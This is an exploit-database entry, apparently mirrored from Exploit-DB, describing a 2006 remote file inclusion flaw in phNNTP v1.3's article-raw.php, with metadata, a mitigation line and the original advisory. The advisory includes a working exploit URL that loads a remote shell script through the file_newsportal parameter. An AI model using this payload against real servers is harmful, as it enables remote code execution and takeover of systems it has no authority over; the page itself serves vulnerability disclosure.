header-logo
Suggest Exploit
vendor:
phNNTP
by:
ToxiC, Drago84, Str0ke
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phNNTP
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:phnntp:phnntp:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phNNTP v1.3 Remote File Inclusion

phNNTP v1.3 is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user-supplied input. The vulnerable code is located in the article-raw.php file, which declares the variable file_newsportal. An attacker can exploit this vulnerability by supplying a malicious URL in the file_newsportal parameter. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:
require("$file_newsportal");

Page Affect:
article-raw.php

Path:
Declare file_newsportal

ExP:
http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?

Greatz: Str0ke

# milw0rm.com [2006-08-08]

Navigation

Suggest Exploit

Services By CQR